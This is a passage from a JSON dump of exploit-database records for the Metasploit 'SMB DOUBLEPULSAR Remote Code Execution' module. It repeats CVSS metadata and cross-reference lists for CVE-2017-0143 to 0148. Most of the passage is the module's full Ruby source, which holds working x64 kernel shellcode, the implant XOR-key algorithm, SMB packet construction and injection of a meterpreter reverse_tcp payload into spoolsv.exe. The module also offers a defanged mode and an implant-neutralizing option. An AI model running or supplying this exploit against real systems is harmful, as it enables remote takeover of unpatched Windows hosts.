\"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-30] #"}, "lastseen": "2021-10-29T22:19:20", "differentElements": ["sourceData"], "edition": 59}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "2650fe11832782e6004bcfa4729ad94f", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-30T23:12:04", "history": [], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-29702"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0146/"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0144"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96705", "SMNTC-96703", "SMNTC-96704", "SMNTC-96706", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-30T23:12:04", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-30T23:12:04", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-31] #"}, "lastseen": "2021-10-30T23:12:04", "differentElements": ["sourceData"], "edition": 60}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "116b76e777723d2231df06a2ff229420", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-11-01T00:13:44", "history": [], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987", 